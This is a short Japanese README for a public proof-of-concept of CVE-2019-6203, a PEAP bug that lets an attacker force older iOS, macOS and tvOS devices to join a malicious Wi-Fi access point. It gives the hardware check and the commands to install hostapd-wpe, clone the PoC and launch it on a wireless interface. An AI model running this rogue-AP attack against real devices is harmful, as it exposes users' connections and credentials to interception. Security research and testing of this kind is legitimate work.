
CVE-2019-6203のPoC、iOS 12.2未満、macOS 10.14.4未満で動作
すべてのAppleデバイスにPEAPのバグが存在し、攻撃者がAppleデバイス(iOS、macOS、tvOS)を悪意のあるアクセスポイントに強制的に接続させることが可能です。
これはCVE-2019-6203のPoCで、iOS 12.2未満、macOS 10.14.4未満で動作し、Kali Linux上でテスト済みです。
このPoCを実行するには、APモードをサポートするWi-Fiカードが必要です。これはiw listを実行して確認できます。出力例:
Supported interface modes:
* IBSS
* managed
* AP
* AP/VLAN
* monitor
* mesh point
apt install hostapd-wpe dnsmasq
git clone https://github.com/qingxp9/CVE-2019-6203-PoC
cd CVE-2019-6203-PoC
python CVE-2019-6203-PoC.py -i wlan0
# インターネットあり
python CVE-2019-6203-PoC.py -i wlan0 -o eth0